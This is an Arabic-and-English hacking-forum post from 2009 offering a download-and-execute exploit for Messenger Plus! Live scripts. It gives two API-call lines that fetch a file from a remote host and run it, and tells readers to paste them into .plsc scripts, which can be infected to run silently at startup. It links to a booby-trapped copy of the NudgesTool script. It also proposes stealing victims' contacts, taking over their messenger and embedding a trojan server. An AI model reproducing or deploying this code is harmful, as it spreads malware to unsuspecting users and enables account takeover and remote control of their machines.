شلونكم شباب
بسم الله والصلاة والسلام على رسول الله ,,,
--------------------------------------------------------------------------------------------
Messenger Plus *Live Download & Execute Exploit
تلغيمـ سكربتاتـ المسنجر بلسـ ( plsc ) تحميلـ + تنفيذ ,,,
Discoverd By Syntax_err
Tested On ver: 4.60.0.324
Syntax_err [at]
http://opensc.wsgreetz :[*] SecuritY^GhosT :
securityghost@w.cn[*] EmBrAtOuR:
stormn0rth@hotmail.com[*] GamingMasteR:
gamingmaster.SG@hotmail.com / at4re.com[*] p0ke : opensc [at] irc.chatcafe.net [IRC][*] Sas0ri :
sas0ri@hotmail.com[*] هكر تحت التدريب :
hacker@under.training[*] DarkMo0n :
moon14-moon15@hotmail.com--------------------------------------------------------
لما كان المسنجر بلس يقبل إستدعاء دوال الـ API بإمكاننا الآن إستدعاء دوال تحميل + تنفيذ لتحميل ملف محدد
للنوبز ,, إنسخوا وإلصقوا بالحدث الذي تريدونه للتنفيذ
Since msnplus allowing API calling , we can call URLDownloadToFile and ShellExecute to download & execute file 4m url
noobs: just copy n paste this 2 lines in ur Theme/Script
* this will download a jpg file ,, don't be scary
change wht u need
هذا هو كود التحميل ,, هنا يحمل صورة فقط ,, لا تخاف , المثال exe بالأسفل,,,
كود:
- الكود:
-
{
Interop.Call("urlmon.dll", "URLDownloadToFileW", 0, "http://www.zahran1.com/wtsup/1.jpg", "c:\\syntax.jpg", 0, 0);
Interop.Call("shell32.dll", "ShellExecuteW",0 ,null , "c:\\syntax.jpg" ,null ,null ,1);
}
تستطيع وضع الكود في أي حدث ,,, وتستطيع تغيير وضع الظهور من 1 إلى 0 , تذكر أن السكربت , هو عبارة عن ملف zip ,, وصيغته plsc
في المثال بالأسفل , السكربت يقوم بتحمال ملف exe إلى c:\win.exe ومن ثم تنفيذه بشكل صامتـ ,,,
لا يدعي أحد إنه إكتشف الطريقة قبلي ,, الطريقة لها عندي ما يقارب الـ 8 شهور ,, ومن إدعى ذلك ,, فلينظر للمرآة ويقول لي ماذا يرى ؟؟!
u can put this code in OnEvent_Initialize(bMessengerStart) or any event u want
u can change the nShowCmd to SW_SHOWNORMAL or SW_SHOWHIDE or wht ever ,, u know the API's
remmember that scripts r ZIP files named into .plsc ,, so infect ur scripts n u know the rest :p
أستطيع إضافة كود لكشف قرص تثبيت النظام , تشفير الروابط والكلمات وما إلى ذلك ,, تستطيع عمل برنامج إختراق متكامل , بالسكربتات :!
سرقة الكونتاكت تبع الضحية والتحكم بالمسنجر الخاص به ,,
وضع الكود في حدث إستقبال رسالة منك , يعني ممكن ترسل له كل مرة رابط ,, وتحدد متى يتم التحميل ,,
وضع السيرفر داخل السكربت ومن ثم فقط تنفذيه بدون تحميل ,,,
التحكم بالملفات وكل شي ,, كل ذلك عبر الـ API !!!
can some one use NtOpenSection 2 Edit Kernel ?? I think So
, so lets Restore SDT :p
بالمثال/ سكربت NudgesTool الشهير , ملغم ببدء التشغيل , أول ما يثبت السكربت تتم العملية , أول ما تشغل الإيميل تتم العملية ,,
الخلاصة: عندنا صيغة جديدة ... plsc ,, هذا اللي رح يطلع بيه اللامرز ,, وورونا إنتوا رح تطلعوا بإيه ؟؟!
رابط المثال :
http://www.zahran1.com/wtsup/script.plscC u
http://www.h3-cy.com/manegar.gif" border="0" alt=""/>
أخوكم
محمد البصراوي
أيملي للمراسله
EVELL_HAKAR@YAHOO.COM
موضوع: تلغيمـ سكربتاتـ المسنجر بلسـ ( plsc ) تحميلـ + تنفيذ ,,, 
السبت يونيو 06, 2009 8:31 pm